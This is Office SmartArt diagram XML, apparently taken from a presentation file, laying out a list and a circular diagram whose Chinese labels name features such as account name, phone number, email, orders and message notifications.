      <dgm:prSet presAssocID="{6294D9F2-2815-4AB5-AE7A-211B550E8A9F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294FD11C-BDC0-4C20-9996-499BE31BD2AD}" type="pres">
      <dgm:prSet presAssocID="{6294D9F2-2815-4AB5-AE7A-211B550E8A9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94CA64-3574-49AE-B21F-C92A43AF635F}" type="pres">
      <dgm:prSet presAssocID="{6294D9F2-2815-4AB5-AE7A-211B550E8A9F}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D787A559-B9E9-403D-844A-8A0716CA5C9D}" type="pres">
      <dgm:prSet presAssocID="{6294D9F2-2815-4AB5-AE7A-211B550E8A9F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D061BD-39E3-40AD-9EA6-ABACA520A57B}" type="pres">
      <dgm:prSet presAssocID="{0134E715-A07D-4F07-B372-BD1E16E0DE95}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E6E1A1E0-E1EA-4F03-8863-41DC11D337BB}" type="pres">
      <dgm:prSet presAssocID="{BBB10C67-DDF7-44C2-8FFA-42F0443524DC}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{58230EB9-1766-48C8-A477-0B82BE112BF3}" type="pres">
      <dgm:prSet presAssocID="{BBB10C67-DDF7-44C2-8FFA-42F0443524DC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21C27FE4-3726-41F2-92B6-3855DD13ED05}" type="pres">
      <dgm:prSet presAssocID="{BBB10C67-DDF7-44C2-8FFA-42F0443524D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31B214-1B9F-4775-AF71-4BD7492CE795}" type="pres">
      <dgm:prSet presAssocID="{BBB10C67-DDF7-44C2-8FFA-42F0443524DC}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B5F7A6EA-A687-4585-B4FF-629F21493427}" type="pres">
      <dgm:prSet presAssocID="{BBB10C67-DDF7-44C2-8FFA-42F0443524DC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422BF3-A480-48E3-807F-0B56170E9DB5}" type="pres">
      <dgm:prSet presAssocID="{B2CBB239-C61F-4835-8ADE-386B9646FE0C}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EEF031BA-4C0D-4EBD-A73C-7A799F6A3D22}" type="pres">
      <dgm:prSet presAssocID="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{61699D32-0CB1-4AB4-99E2-6D997ADB91E4}" type="pres">
      <dgm:prSet presAssocID="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8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8E010E54-9FF2-4770-BFC7-36078B0410D2}" type="pres">
      <dgm:prSet presAssocID="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B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89A533-79CC-4E26-A0D9-EA1000B42916}" type="pres">
      <dgm:prSet presAssocID="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DAE9CCA3-EC81-421B-B16B-F0C546F315D3}" type="pres">
      <dgm:prSet presAssocID="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8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D4C545-0E8F-41E0-8553-A0B7A8028997}" type="pres">
      <dgm:prSet presAssocID="{865636CD-6B95-4E2E-8648-EFE9DB12DB68}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4B664CB-A205-4714-A826-23E8B070A756}" type="pres">
      <dgm:prSet presAssocID="{3CC7C495-030E-4363-A8A8-54A8078D2A6E}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8ED4BAA-7D38-47F9-ACBB-024D2C96AF8D}" type="pres">
      <dgm:prSet presAssocID="{3CC7C495-030E-4363-A8A8-54A8078D2A6E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3AA1B811-07BF-43A8-8090-2334E3992195}" type="pres">
      <dgm:prSet presAssocID="{3CC7C495-030E-4363-A8A8-54A8078D2A6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D7E01C-E66A-465B-A6BC-4563CAF31C66}" type="pres">
      <dgm:prSet presAssocID="{3CC7C495-030E-4363-A8A8-54A8078D2A6E}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3725CF3F-D929-412D-92AC-23A70D3BEE25}" type="pres">
      <dgm:prSet presAssocID="{3CC7C495-030E-4363-A8A8-54A8078D2A6E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E572141-4900-45AF-8376-3BC696EFB29B}" srcId="{F3164785-D9E2-4D5A-989B-4CAEC62BE107}" destId="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8}" srcOrd="2" destOrd="0" parTransId="{F1E8ECF9-C8EF-42CA-B393-FEAD9CDCDD62}" sibTransId="{865636CD-6B95-4E2E-8648-EFE9DB12DB68}"/>
    <dgm:cxn modelId="{8DB8FC7D-FD58-4BD1-B5BC-C3BAD73B2365}" srcId="{3CC7C495-030E-4363-A8A8-54A8078D2A6E}" destId="{42CECADC-D186-4807-9EDC-14CE27B38ED7}" srcOrd="0" destOrd="0" parTransId="{941AFFA5-EF34-4BDE-86EC-2E10D655D525}" sibTransId="{36DF76F0-A801-4A0A-8436-9838DCB09070}"/>
    <dgm:cxn modelId="{ED04A3C9-60D8-DE43-9019-1A99900C9529}" type="presOf" srcId="{BBB10C67-DDF7-44C2-8FFA-42F0443524DC}" destId="{58230EB9-1766-48C8-A477-0B82BE112BF3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FCCAE21E-AFB0-694B-9CF2-DCEB6AAF6DD1}" type="presOf" srcId="{D10FFD6A-589E-44AB-A474-8C120CFC4CE7}" destId="{3725CF3F-D929-412D-92AC-23A70D3BEE25}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3B90C3D4-8328-3A47-B03D-653DD189FF50}" type="presOf" srcId="{CB25321F-65B0-4027-9601-A6AA5E6FD7A5}" destId="{B5F7A6EA-A687-4585-B4FF-629F21493427}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{587DFEC7-81FC-D54C-85D1-09459C37498B}" type="presOf" srcId="{BBB10C67-DDF7-44C2-8FFA-42F0443524DC}" destId="{21C27FE4-3726-41F2-92B6-3855DD13ED05}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{981403F2-5D77-4DF6-AD9A-E20304987503}" srcId="{3CC7C495-030E-4363-A8A8-54A8078D2A6E}" destId="{F18610BD-C23B-4DB0-89F5-90ADE607CBDC}" srcOrd="3" destOrd="0" parTransId="{3A11E257-FD00-42D7-8E39-1AEE3869B433}" sibTransId="{CDB6A546-041F-43B9-8B2C-B6B704ED2CF0}"/>
    <dgm:cxn modelId="{BAE5CCD5-5B35-B840-8610-DB87CAD6D96E}" type="presOf" srcId="{6294D9F2-2815-4AB5-AE7A-211B550E8A9F}" destId="{09EC4044-2DFA-499A-A48D-C08EA4FA71DA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{64CA95F3-A9E9-EF41-92FD-B5AB365770EA}" type="presOf" srcId="{F3164785-D9E2-4D5A-989B-4CAEC62BE107}" destId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{18FBAAD2-E9B9-FC41-AFFF-8D6741B31F7A}" type="presOf" srcId="{8A632CE0-E85E-4373-AE96-D76AB4396702}" destId="{DAE9CCA3-EC81-421B-B16B-F0C546F315D3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D6CCE0A9-90A7-FE43-81A2-75BF2C2CE697}" type="presOf" srcId="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8}" destId="{61699D32-0CB1-4AB4-99E2-6D997ADB91E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{08083346-3078-496E-B5E2-FC712E572E1C}" srcId="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8}" destId="{8A632CE0-E85E-4373-AE96-D76AB4396702}" srcOrd="0" destOrd="0" parTransId="{17C2E703-D343-46F4-9317-E1E9C2E629E7}" sibTransId="{74950794-5800-4B62-B226-DCFCB58A8BF4}"/>
    <dgm:cxn modelId="{F12875A4-6877-3843-9993-C8DC8CEA0BD1}" type="presOf" srcId="{3CC7C495-030E-4363-A8A8-54A8078D2A6E}" destId="{A8ED4BAA-7D38-47F9-ACBB-024D2C96AF8D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{42818D32-36A8-4F14-AC5B-0C0D3FFC4C61}" srcId="{F3164785-D9E2-4D5A-989B-4CAEC62BE107}" destId="{3CC7C495-030E-4363-A8A8-54A8078D2A6E}" srcOrd="3" destOrd="0" parTransId="{626D8C2A-FD42-4538-BD1A-530BD58ADCEB}" sibTransId="{5DDA7A89-87D4-47A7-A35D-C5E1C0AB9FB8}"/>
    <dgm:cxn modelId="{0B5E9C61-5670-2D42-AAFF-F75AA86DBC93}" type="presOf" srcId="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8}" destId="{8E010E54-9FF2-4770-BFC7-36078B0410D2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BD9BBEE2-FDED-BC4A-853A-BD5801269804}" type="presOf" srcId="{F18610BD-C23B-4DB0-89F5-90ADE607CBDC}" destId="{3725CF3F-D929-412D-92AC-23A70D3BEE25}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3F64BBD1-F803-E247-BE1B-25332BC0F12D}" type="presOf" srcId="{6294D9F2-2815-4AB5-AE7A-211B550E8A9F}" destId="{294FD11C-BDC0-4C20-9996-499BE31BD2AD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{95CC8848-8280-4B72-AF9D-3A5422EB2848}" srcId="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8}" destId="{52EAD5F0-7864-4EF6-869C-1F4722890547}" srcOrd="3" destOrd="0" parTransId="{6F06F7BB-0298-4774-9B73-065B5B4985F1}" sibTransId="{1E0FD418-6C70-4140-A7B2-55BF12A9D206}"/>
    <dgm:cxn modelId="{FB5EB1E1-3D21-AB47-872D-CF547A017E45}" type="presOf" srcId="{DE8EE64D-F0F7-4094-A630-99B20254DA69}" destId="{D787A559-B9E9-403D-844A-8A0716CA5C9D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A090DB0F-793B-8D4A-8C56-52C826A6712B}" type="presOf" srcId="{52EAD5F0-7864-4EF6-869C-1F4722890547}" destId="{DAE9CCA3-EC81-421B-B16B-F0C546F315D3}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1F742B34-C2AB-46BC-B09A-6F7C4FEED64E}" srcId="{3CC7C495-030E-4363-A8A8-54A8078D2A6E}" destId="{D10FFD6A-589E-44AB-A474-8C120CFC4CE7}" srcOrd="2" destOrd="0" parTransId="{7F5D2444-F6CA-4250-9922-7B19111D08C0}" sibTransId="{F65AC777-5C57-4B21-97F8-1F2C4C0B6DF6}"/>
    <dgm:cxn modelId="{32AA904F-4BF7-4603-AF95-DEE420B64EAB}" srcId="{F3164785-D9E2-4D5A-989B-4CAEC62BE107}" destId="{6294D9F2-2815-4AB5-AE7A-211B550E8A9F}" srcOrd="0" destOrd="0" parTransId="{0215E96C-BD2A-4B4B-8686-AA30D62A9A00}" sibTransId="{0134E715-A07D-4F07-B372-BD1E16E0DE95}"/>
    <dgm:cxn modelId="{F320B370-21CC-4D14-AEE1-356E96176436}" srcId="{BBB10C67-DDF7-44C2-8FFA-42F0443524DC}" destId="{CB25321F-65B0-4027-9601-A6AA5E6FD7A5}" srcOrd="0" destOrd="0" parTransId="{112C98B6-8D2B-4475-9818-1F8AF0E64789}" sibTransId="{DFED127F-5041-471C-995B-A24BEC1C9578}"/>
    <dgm:cxn modelId="{1D6196C3-913F-4B00-BE24-13156576333D}" srcId="{3CC7C495-030E-4363-A8A8-54A8078D2A6E}" destId="{C4A74086-694D-441A-A97E-4A49A5A5BAAC}" srcOrd="1" destOrd="0" parTransId="{EC424436-4FE2-4A16-806C-72D365699758}" sibTransId="{953A078C-B5BE-4ACE-BFD9-381336EA33FF}"/>
    <dgm:cxn modelId="{2492B920-ED2B-D04D-A336-6B4BE79F8765}" type="presOf" srcId="{42CECADC-D186-4807-9EDC-14CE27B38ED7}" destId="{3725CF3F-D929-412D-92AC-23A70D3BEE25}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5E10426E-1CD7-440A-B6A0-CFDF7215AB26}" srcId="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8}" destId="{982550F7-7298-4C7D-9134-78239F78BE30}" srcOrd="1" destOrd="0" parTransId="{A3A303B3-F084-443B-88EA-97B49BBAB5C6}" sibTransId="{9F06E34A-BF23-4D15-A043-3A73AA854A55}"/>
    <dgm:cxn modelId="{A4BA9D09-24FF-A948-BA24-25631CF1B45D}" type="presOf" srcId="{982550F7-7298-4C7D-9134-78239F78BE30}" destId="{DAE9CCA3-EC81-421B-B16B-F0C546F315D3}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B191A7BB-2987-45E0-A862-966D8046015A}" srcId="{6294D9F2-2815-4AB5-AE7A-211B550E8A9F}" destId="{DE8EE64D-F0F7-4094-A630-99B20254DA69}" srcOrd="0" destOrd="0" parTransId="{080125E6-6B47-44B5-8B08-67AEC09640DA}" sibTransId="{F3B4047D-8E0D-4582-8D3C-E6F176D2576C}"/>
    <dgm:cxn modelId="{DF702F61-63F4-4A93-B850-105C79D1649C}" srcId="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8}" destId="{22EA5057-A671-4B87-B58E-4CDEFE580122}" srcOrd="2" destOrd="0" parTransId="{9BBA5E37-C404-41A0-A569-53A6EC54C9DD}" sibTransId="{0D086DF9-64F2-474F-B579-A77F431E642D}"/>
    <dgm:cxn modelId="{594D9DEB-8AD7-1649-8091-2592B621EC32}" type="presOf" srcId="{3CC7C495-030E-4363-A8A8-54A8078D2A6E}" destId="{3AA1B811-07BF-43A8-8090-2334E3992195}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9472EE4A-2934-406C-99A7-A4307053452F}" srcId="{F3164785-D9E2-4D5A-989B-4CAEC62BE107}" destId="{BBB10C67-DDF7-44C2-8FFA-42F0443524DC}" srcOrd="1" destOrd="0" parTransId="{F464592B-72A3-4FE6-A537-E0A149A806DF}" sibTransId="{B2CBB239-C61F-4835-8ADE-386B9646FE0C}"/>
    <dgm:cxn modelId="{8CE3E8CD-D8F8-164A-915D-F08C22BD512E}" type="presOf" srcId="{22EA5057-A671-4B87-B58E-4CDEFE580122}" destId="{DAE9CCA3-EC81-421B-B16B-F0C546F315D3}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{275B3D1E-CCE6-304E-9265-DD61F37AE199}" type="presOf" srcId="{C4A74086-694D-441A-A97E-4A49A5A5BAAC}" destId="{3725CF3F-D929-412D-92AC-23A70D3BEE25}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{54F02DB7-7C95-364D-B818-7EC2D175A92B}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{94CC34BC-18F4-42BC-B9E9-61A06EBAF248}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7DA7A92C-125D-5A47-BCD7-5637971B4C3F}" type="presParOf" srcId="{94CC34BC-18F4-42BC-B9E9-61A06EBAF248}" destId="{09EC4044-2DFA-499A-A48D-C08EA4FA71DA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{989E153A-1657-8B44-B6B9-1DE6F356CB9E}" type="presParOf" srcId="{94CC34BC-18F4-42BC-B9E9-61A06EBAF248}" destId="{294FD11C-BDC0-4C20-9996-499BE31BD2AD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9407D7BC-697B-E84F-827A-E0386CE92A6F}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{4594CA64-3574-49AE-B21F-C92A43AF635F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F6DB37D3-2872-034F-A5C0-830407F57894}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{D787A559-B9E9-403D-844A-8A0716CA5C9D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{69822E9D-3052-E64B-91C0-7A08F3803839}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{A8D061BD-39E3-40AD-9EA6-ABACA520A57B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9B2A42B9-467F-3248-A8E7-E0CF9C8FF1A0}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{E6E1A1E0-E1EA-4F03-8863-41DC11D337BB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B1268E19-3CAC-C94D-ABDF-3FA04598D957}" type="presParOf" srcId="{E6E1A1E0-E1EA-4F03-8863-41DC11D337BB}" destId="{58230EB9-1766-48C8-A477-0B82BE112BF3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{21C96B54-A580-8C44-9837-A7D013E63D4D}" type="presParOf" srcId="{E6E1A1E0-E1EA-4F03-8863-41DC11D337BB}" destId="{21C27FE4-3726-41F2-92B6-3855DD13ED05}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4776C425-7C4C-354E-A20D-91A8236DEB8E}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{2731B214-1B9F-4775-AF71-4BD7492CE795}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6D0C32C7-37FE-B149-B432-F03BBF0B6043}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{B5F7A6EA-A687-4585-B4FF-629F21493427}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A835AF54-C63C-BB47-8470-E8224632E083}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{11422BF3-A480-48E3-807F-0B56170E9DB5}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1172C55F-2C12-EA48-92BE-4AD4FC89B8E6}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{EEF031BA-4C0D-4EBD-A73C-7A799F6A3D22}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{058BAA1C-8C86-854A-8E00-16960346E838}" type="presParOf" srcId="{EEF031BA-4C0D-4EBD-A73C-7A799F6A3D22}" destId="{61699D32-0CB1-4AB4-99E2-6D997ADB91E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{340B8B20-2672-C64A-BDDC-F7AE989C65D9}" type="presParOf" srcId="{EEF031BA-4C0D-4EBD-A73C-7A799F6A3D22}" destId="{8E010E54-9FF2-4770-BFC7-36078B0410D2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4872D101-153A-C649-A1DC-116388F0B9A0}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{4989A533-79CC-4E26-A0D9-EA1000B42916}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{80C575EF-05FC-9748-8D67-642CB14C59BA}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{DAE9CCA3-EC81-421B-B16B-F0C546F315D3}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{90CD5171-DCEB-5748-ACCE-206104332BC2}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{01D4C545-0E8F-41E0-8553-A0B7A8028997}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8B72A63D-BAE9-B042-A204-AD4D1972BABA}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{C4B664CB-A205-4714-A826-23E8B070A756}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5890603F-B595-AF4B-B1B4-56FBF8672460}" type="presParOf" srcId="{C4B664CB-A205-4714-A826-23E8B070A756}" destId="{A8ED4BAA-7D38-47F9-ACBB-024D2C96AF8D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{84AE4874-8590-C942-9107-D05C6A206B97}" type="presParOf" srcId="{C4B664CB-A205-4714-A826-23E8B070A756}" destId="{3AA1B811-07BF-43A8-8090-2334E3992195}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{97C80920-A767-DE42-90A8-1C99E50DD0B9}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{79D7E01C-E66A-465B-A6BC-4563CAF31C66}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{82350053-D544-224D-AF56-1FC036DDEBD2}" type="presParOf" srcId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" destId="{3725CF3F-D929-412D-92AC-23A70D3BEE2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B8CE9-8E9A-419A-B7CF-0359D290A74D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2099855" y="387834"/>
          <a:ext cx="5340667" cy="5340667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帐户名</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4905613" y="883753"/>
        <a:ext cx="1271587" cy="1017270"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{585117AF-691A-4244-9B32-63942D9F1899}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2168520" y="473666"/>
          <a:ext cx="5340667" cy="5340667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id</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5795724" y="2409658"/>
        <a:ext cx="1462325" cy="890111"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F419E279-6D5A-4A54-87E6-D345D788E1AC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2143724" y="581751"/>
          <a:ext cx="5340667" cy="5340667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手机号</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5573196" y="3744825"/>
        <a:ext cx="1271587" cy="985480"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E5B4EF1A-92C2-42DC-AEAC-0ACDD620F72E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2044541" y="629435"/>
          <a:ext cx="5340667" cy="5340667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邮箱</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4094976" y="4825674"/>
        <a:ext cx="1239797" cy="890111"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{63B1C6D5-9295-497C-9AE9-851C8430DE8C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1945357" y="581751"/>
          <a:ext cx="5340667" cy="5340667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订单</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2584965" y="3744825"/>
        <a:ext cx="1271587" cy="985480"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{483C9DFB-BBFF-4ABF-98A9-3FED709CB8C5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1920561" y="473666"/>
          <a:ext cx="5340667" cy="5340667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消息通知</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2171699" y="2409658"/>
        <a:ext cx="1462325" cy="890111"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C50E6F7D-692E-456B-80C1-C98A215A9660}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1989226" y="387834"/>
          <a:ext cx="5340667" cy="5340667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名单</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3252549" y="883753"/>
        <a:ext cx="1271587" cy="1017270"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E1827485-9CF7-433F-85D2-84AAFECF8CB9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1768976" y="57221"/>
          <a:ext cx="6001893" cy="6001893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F4C0C-07CA-4360-9CCC-0839560305D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1838073" y="143433"/>
          <a:ext cx="6001893" cy="6001893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1BF9D-4FA0-4920-ABA5-E78B58FC6388}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1813189" y="251267"/>
          <a:ext cx="6001893" cy="6001893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824D2-FA2A-48C6-B206-F59F5E616C9D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1713928" y="298683"/>
          <a:ext cx="6001893" cy="6001893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B1A54-E60C-400B-BA39-66318D41FE97}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1614666" y="251267"/>
          <a:ext cx="6001893" cy="6001893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0AA75-14DD-4E9F-B12B-A0DBFA93796E}">
